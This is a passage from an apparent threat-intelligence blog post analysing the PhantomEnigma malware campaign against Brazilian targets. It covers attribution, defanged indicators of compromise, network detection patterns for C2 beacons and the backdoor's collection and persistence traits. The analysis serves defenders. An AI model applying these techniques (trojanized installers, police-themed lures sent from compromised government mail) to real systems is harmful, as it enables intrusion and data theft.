                    "
                    >
                                        protocolo.sorocaba.sp.gov[.]br                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        14                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        prodoc.ap.gov[.]br                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        17                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        portaldrh.tjba.jus[.]br                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        17                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-349'>
table#wpdtSimpleTable-349{ table-layout: fixed !important; }
table#wpdtSimpleTable-349 td, table.wpdtSimpleTable349 th { white-space: normal !important; }
.wpdt-bc-FFFFFF { background-color: #FFFFFF !important;}
</style>




<p class="wp-block-paragraph">The two arms also use the same Polícia Civil theme&nbsp;and rely on compromised public-sector infrastructure to make their delivery activity appear more trustworthy.&nbsp;</p>



<p class="wp-block-paragraph">The&nbsp;Ofício-PC&nbsp;analyses&nbsp;generally stop&nbsp;at the PowerShell download stage, before the Node.js/Inno installer becomes visible. For that reason, the absence of Node.js&nbsp;and Inno Setup tags in these&nbsp;analyses does not&nbsp;indicate&nbsp;a separate operator. It reflects the stage at which the observed execution ended.&nbsp;</p>



<p class="wp-block-paragraph">A build-chain comparison alone is therefore not enough to separate the two arms.&nbsp;PhantomEnigma&nbsp;appears to use different delivery chains for&nbsp;different parts&nbsp;of the operation, while reusing infrastructure, themes,&nbsp;and supporting components.&nbsp;</p>



<p class="wp-block-paragraph">Based on the shared government hosts, matching Polícia Civil lures,&nbsp;and&nbsp;sandbox-visible delivery&nbsp;behavior,&nbsp;<a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;assesses the link to the same operator with medium-high confidence.&nbsp;Additional&nbsp;email evidence&nbsp;and the installer-to-BAT second-stage connection further strengthen this assessment.&nbsp;</p>



<p class="wp-block-paragraph">For security teams, recognizing these links matters. Treating the&nbsp;Ofício-PC activity&nbsp;and the Inno/Node.js backdoor as unrelated campaigns could hide the true scope of the operation, fragment investigations, delay containment,&nbsp;and increase response&nbsp;and recovery costs.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="677" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-1024x677.png" alt="" class="wp-image-22147" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-1024x677.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-300x198.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-768x508.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-370x245.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-270x179.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9-740x489.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image9.png 1190w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The BAT script from January malicious campaign</em></figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="535" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-1024x535.png" alt="" class="wp-image-22148" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-1024x535.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-300x157.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-768x401.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-370x193.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-270x141.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea-740x387.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/imagea.png 1504w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The BAT script from public research</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Defining the&nbsp;PhantomEnigma&nbsp;Cluster Boundaries&nbsp;</h2>



<p class="wp-block-paragraph">During the investigation,&nbsp;analysts&nbsp;identified&nbsp;several adjacent malware clusters that initially appeared connected to&nbsp;PhantomEnigma. These included malicious GitHub releases, a help.bat loader,&nbsp;and&nbsp;Steal Cactivity linked&nbsp;through shared scripts&nbsp;and public metadata.&nbsp;</p>



<p class="wp-block-paragraph">Further analysis showed that these clusters should not be included in the confirmed PhantomEnigma activity based on the available evidence.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="748" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-1024x748.png" alt="" class="wp-image-22146" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-1024x748.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-300x219.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-768x561.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-370x270.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-270x197.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5-740x540.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image5.png 1086w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The BAT script from new GitHub repo</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph">The help.bat / kak[.]is loader uses a logic-identical template across 56 sandbox analyses. Its execution chain includes get_it.php, Base64-encoded data.json, a password-protected archive, file staging in PUBLIC\Documents, a timed delay, and MSI execution.</p>



<p class="wp-block-paragraph">However, this loader did not overlap with the core PhantomEnigma build-chain and backdoor signals. Instead, it delivered commodity malware such as HijackLoader, Emmenhtal, ClickFix, and other MSI-based payloads. No PhantomEnigma Node.js backdoor was observed in this cluster.</p>



<p class="wp-block-paragraph">The GitHub-to-StealC activity also showed important differences. It lacked the same installer and backdoor characteristics, used separate infrastructure and registration patterns, and had a different submission profile. The proposed connection relies partly on GitHub commit metadata that is not visible in the sandbox and is not enough on its own to confirm a shared operator.</p>



<p class="wp-block-paragraph">The evidence therefore supports treating these clusters as adjacent activity that may reuse common tools or distribution methods, rather than confirmed PhantomEnigma operations. Keeping them separate helps maintain accurate attribution and prevents unrelated malware from being grouped into the campaign without sufficient evidence.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="676" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-1024x676.png" alt="" class="wp-image-22149" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-1024x676.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-300x198.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-768x507.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-1536x1014.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-370x244.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-270x178.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10-740x489.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-21.09.10.png 1796w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">Attribution Assessment&nbsp;</h2>



<p class="wp-block-paragraph">The evidence supports the existence of a coordinated campaign focused primarily on Brazil. The earliest related activity in the dataset&nbsp;dates to&nbsp;January 13, 2026.&nbsp;</p>



<p class="wp-block-paragraph">One of the strongest delivery findings involved&nbsp;an&nbsp;email sent from a Brazilian&nbsp;police department. The message passed SPF, DKIM,&nbsp;and DMARC checks,&nbsp;indicating&nbsp;that it was&nbsp;likely sent&nbsp;through a genuinely compromised mailbox rather than&nbsp;from a simply spoofed address. The recovered email&nbsp;and the accompanying “Ofício&nbsp;Polícia Civil” PDF further confirm the use of official-looking police communications as a phishing lure.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="626" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-1024x626.png" alt="" class="wp-image-22177" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-1024x626.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-300x183.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-768x470.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-370x226.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-270x165.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2-740x452.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image8-2.png 1310w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Email security flags check inside&nbsp;ANY.RUN</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The assessment is supported by several independent technical signals, including:&nbsp;</p>



<ul class="wp-block-list">
<li>A recurring Delphi/Inno Setup&nbsp;and Node.js build chain&nbsp;</li>



<li>Patched&nbsp;Boostnote&nbsp;applications&nbsp;containing&nbsp;the malicious index.js backdoor&nbsp;</li>



<li>The&nbsp;&lt;name&gt;&nbsp;communication pattern, which sends victim system information, including the computer name&nbsp;and username&nbsp;</li>



<li>Known campaign domains&nbsp;and seed indicators&nbsp;</li>



<li>Compromised Brazilian&nbsp;government infrastructure used across related activity&nbsp;</li>



<li>The&nbsp;classification of&nbsp;taaeiuep[.]com as associated with Inno Setup,&nbsp;Procuração&nbsp;Digital,&nbsp;and Brazil-focused malicious activity&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Based on this evidence,&nbsp;ANY.RUN&nbsp;assesses with high confidence that the observed campaign is real&nbsp;and primarily focused on Brazil.&nbsp;</p>



<p class="wp-block-paragraph">The connection between the specific Inno/Node.js backdoor arm and PhantomEnigma is assessed with medium-high confidence. The build chain, infrastructure, targeting, and backdoor behavior provide strong supporting evidence, but limited public research currently connects the PhantomEnigma name directly to this Boostnote-based backdoor.</p>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> analysts identified 231 sandbox analyses sharing the broader build pattern. Within this group, approximately 108–125 analyses also contained stronger PhantomEnigma indicators. This more tightly attributed core forms the basis of the campaign assessment, while the wider cluster provides additional coverage for threat hunting.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Stay ahead of hidden attack paths.  </span><br>
Strengthen visibility and reduce business risk with ANY.RUN
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Reduce Business Risk </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">The&nbsp;Ofício-PC activity is also linked to the wider operation with medium-high confidence based on shared compromised government hosts, matching Polícia Civil lures,&nbsp;and supporting delivery evidence. Adjacent help.bat&nbsp;and&nbsp;StealC&nbsp;clusters were kept separate because the available evidence did not support a confident operator-level connection.&nbsp;</p>



<p class="wp-block-paragraph">This approach allows defenders to track related activity broadly while maintaining clear boundaries around what can be directly attributed to PhantomEnigma.</p>



<h2 class="wp-block-heading">Detection&nbsp;and Monitoring Recommendations&nbsp;</h2>



<p class="wp-block-paragraph">Security teams can use the following methods to detect current PhantomEnigma activity and track new infrastructure as the campaign evolves.</p>



<h3 class="wp-block-heading">1.&nbsp;Analyze&nbsp;suspicious files&nbsp;and links in&nbsp;an&nbsp;interactive&nbsp;sandbox&nbsp;</h3>



<p class="wp-block-paragraph">Do not stop at&nbsp;an&nbsp;initial&nbsp;clean&nbsp;verdict. Inspect dropped files, process activity, persistence mechanisms, network requests,&nbsp;and second-stage payloads.&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/34ee47ce-6571-4f83-8e11-bf04aaef316d/" target="_blank" rel="noreferrer noopener">Check PhantomEnigma&nbsp;analysis</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="569" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-1024x569.png" alt="" class="wp-image-22152" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-1024x569.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-1536x853.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-2048x1138.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.32.29-740x411.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>PhantomEnigma&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Re-detonating a sample can&nbsp;also reveal&nbsp;behavior&nbsp;that did not appear during the first&nbsp;analysis, particularly when infrastructure was temporarily unavailable or the malware delayed execution.&nbsp;</p>



<h3 class="wp-block-heading">2. Hunt for the malicious index.js backdoor with YARA&nbsp;</h3>



<p class="wp-block-paragraph">Focus on the recovered backdoor code rather than&nbsp;relying only on domains, file names, or hashes that may change.&nbsp;</p>



<p class="wp-block-paragraph">The strongest YARA rule combines several recurring characteristics:&nbsp;</p>



<ul class="wp-block-list">
<li>The&nbsp;JSON.stringify() beacon structure&nbsp;</li>



<li>COMPUTERNAME&nbsp;and USERNAME collection&nbsp;</li>



<li>The&nbsp;String.fromCharCode&nbsp;decoding method&nbsp;</li>



<li>Persistence&nbsp;through&nbsp;setLoginItemSettings&nbsp;</li>
</ul>



<p class="wp-block-paragraph">A byte-level rule&nbsp;identified&nbsp;one additional related&nbsp;sandbox&nbsp;analysis outside the original dataset. A broader rule combining&nbsp;Boostnote&nbsp;and the malicious index.js pattern&nbsp;identified&nbsp;six&nbsp;analyses&nbsp;involving .gov.br infrastructure, with no unrelated matches in the reviewed dataset.&nbsp;</p>



<p class="wp-block-paragraph">These rules should initially be used for investigation&nbsp;and&nbsp;threat&nbsp;hunting until they are tested against a wider sample set.&nbsp;</p>



<h3 class="wp-block-heading">3. Detect beacon traffic with Suricata&nbsp;</h3>



<p class="wp-block-paragraph">Create monitoring alerts for the following patterns in plaintext or decrypted HTTP traffic:&nbsp;</p>



<ul class="wp-block-list">
<li>/laravel.php?api=api&amp;hash=&nbsp;</li>



<li>&amp;message=PT1n&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The /laravel.php&nbsp;pattern appeared in 16&nbsp;sandbox&nbsp;analyses&nbsp;and produced no unrelated matches in the reviewed dataset.&nbsp;</p>



<p class="wp-block-paragraph">These signatures should first be deployed in monitoring mode so teams can validate them against normal network traffic before using them for automated blocking.</p>



<h3 class="wp-block-heading">4. Correlate build-chain&nbsp;and network&nbsp;behavior&nbsp;</h3>



<p class="wp-block-paragraph">Escalate activity when the recurring&nbsp;PhantomEnigma&nbsp;build chain appears together with one or more network indicators, such as:&nbsp;</p>



<ul class="wp-block-list">
<li>A /laravel.php&nbsp;beacon&nbsp;</li>



<li>A known RAILNET IP address&nbsp;</li>



<li>A system hostname transmitted in a POST request&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This correlation&nbsp;identified&nbsp;59&nbsp;sandbox&nbsp;analyses&nbsp;and revealed malicious network&nbsp;behavior&nbsp;in nine&nbsp;analyses that had initially received clean&nbsp;verdicts.&nbsp;</p>



<h3 class="wp-block-heading">5. Monitor for new compromised government infrastructure&nbsp;</h3>



<p class="wp-block-paragraph">Use the following TI Lookup query to&nbsp;identify&nbsp;activity involving newly compromised Brazilian&nbsp;government hosts:&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup#{%22query%22:%22domainName:%5C%22.gov.br%5C%22%20AND%20threatName:%5C%22nodejs%5C%22%20AND%20threatName:%5C%22inno*%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">domainName:&#8221;.gov.br&#8221;&nbsp;AND&nbsp;threatName:&#8221;nodejs&#8221;&nbsp;AND&nbsp;threatName:&#8221;inno*&#8221;</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1024x586.png" alt="" class="wp-image-22153" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-270x155.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.24.13-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup query shows compromised government hosts</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Running this search regularly can&nbsp;help teams detect new delivery infrastructure as the operator moves between compromised hosts.&nbsp;</p>



<h3 class="wp-block-heading">6. Add validated indicators to security controls&nbsp;</h3>



<p class="wp-block-paragraph">Send confirmed C2 domains, IP addresses, URLs,&nbsp;and file hashes to SIEM, SOAR, EDR,&nbsp;and network security tools&nbsp;through&nbsp;Threat&nbsp;Intelligence&nbsp;Feeds.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="454" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-1024x454.png" alt="" class="wp-image-22154" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-1024x454.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-300x133.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-768x340.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-1536x681.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-2048x907.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-370x164.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-270x120.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-06.38.20-740x328.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s TI Feeds helping teams to enrich existing systems with fresh IOCs collected from 15.000&nbsp;orgs worldwide&nbsp;</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Compromised .gov.br&nbsp;and .jus.br hosts should be handled separately from attacker-controlled infrastructure. These are legitimate services that have been compromised, so blocking them broadly could disrupt access to government resources.&nbsp;</p>



<p class="wp-block-paragraph">Combining <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox evidence</a>, YARA hunting, network detection, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and threat intelligence feeds can help security teams uncover related activity earlier, investigate clean verdicts more effectively, and reduce delays in containment.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce response time by up to 21 minutes per case </span><br>
Contain threats sooner and lower investigation costs. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Accelerate Threat Response  </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Strategic Recommendations for Security Leaders&nbsp;</h2>



<p class="wp-block-paragraph">PhantomEnigma&nbsp;demonstrates how modern campaigns can&nbsp;evade traditional security processes by combining trusted infrastructure, modular malware,&nbsp;and rapidly changing delivery paths. Reducing business risk requires more than&nbsp;adding new IOCs—it requires improving how investigations are prioritized&nbsp;and connected.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Review how &#8220;clean&#8221; verdicts are escalated.</strong>&nbsp;<br>Nearly one-third of the&nbsp;analyzed&nbsp;activity initially received a clean&nbsp;verdict. Establish clear escalation criteria for suspicious files delivered&nbsp;through trusted infrastructure, even when automated detections do not classify them as malicious.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Prioritize&nbsp;behavioral&nbsp;evidence over infrastructure alone.</strong>&nbsp;<br>Domains, IP addresses,&nbsp;and URLs can&nbsp;change within days. Detection strategies should also include recurring malware&nbsp;behavior, execution chains, persistence mechanisms,&nbsp;and network patterns that&nbsp;remain stable across campaign updates.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Treat trusted infrastructure as a potential attack vector.</strong>&nbsp;<br>Compromised government portals&nbsp;and legitimate email accounts can&nbsp;bypass traditional trust-based controls. Ensure security teams&nbsp;validate&nbsp;the&nbsp;behavior&nbsp;behind trusted senders&nbsp;and domains instead of relying solely on reputation.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Correlate investigations across security&nbsp;solutions.</strong>&nbsp;<br>Email alerts, endpoint activity,&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox&nbsp;analysis</a>,&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence</a>&nbsp;should contribute to a single investigation. Fragmented workflows make coordinated campaigns appear as isolated incidents, delaying containment&nbsp;and increasing response costs.&nbsp;</p>



<p class="wp-block-paragraph"><strong>Continuously&nbsp;monitor&nbsp;campaign evolution.</strong>&nbsp;<br>As attackers rotate infrastructure&nbsp;and update malware, detection logic should evolve as well. Regularly review new infrastructure, delivery techniques,&nbsp;and malware variants to prevent existing detections from becoming outdated.&nbsp;</p>



<p class="wp-block-paragraph">Organizations that combine&nbsp;behavioral&nbsp;sandbox&nbsp;analysis with continuously updated&nbsp;threat&nbsp;intelligence can&nbsp;identify&nbsp;coordinated campaigns earlier, reduce investigation time,&nbsp;and limit the operational&nbsp;and&nbsp;financial impact&nbsp;of evolving&nbsp;threats.&nbsp;</p>



<h2 class="wp-block-heading">What to Expect Next&nbsp;</h2>



<p class="wp-block-paragraph">Weekly C2 rotation is likely to continue. New random .com domains may replace&nbsp;psznaoehteeh[.]com, while more police-themed&nbsp;typosquats&nbsp;may appear. One candidate,&nbsp;oficiospolicia[.]com, is already surfacing.&nbsp;</p>



<p class="wp-block-paragraph">The&nbsp;compromised .gov.br delivery network may also continue to grow. At least 20 hosts have been&nbsp;observed, showing that the operator still relies on compromised government infrastructure to make malicious activity appear more trustworthy.&nbsp;</p>



<p class="wp-block-paragraph">Detection may improve, but the visibility gap is unlikely to disappear. Plaintext HTTP beacons are&nbsp;relatively easy&nbsp;to&nbsp;identify, but the operator can&nbsp;move behind HTTPS&nbsp;and Cloudflare, as already seen with /nbw/. When this happens, domains&nbsp;and network paths become less useful, while build-chain&nbsp;analysis&nbsp;and YARA-based detection remain effective.&nbsp;</p>



<p class="wp-block-paragraph">There is also a possibility that the GitHub-to-StealC&nbsp;and&nbsp;ClickFix&nbsp;activity belongs to the same operator. If future evidence confirms this link,&nbsp;PhantomEnigma’s&nbsp;capabilities would be broader than&nbsp;currently assessed.&nbsp;</p>



<p class="wp-block-paragraph">Security teams should therefore avoid relying on domain blocklists alone. Continuous <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox analysis</a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a> monitoring, YARA hunting, and fresh threat intelligence feeds can help detect new infrastructure, review clean verdicts, and keep protection current as the campaign changes.</p>



<h2 class="wp-block-heading">Conclusion&nbsp;</h2>



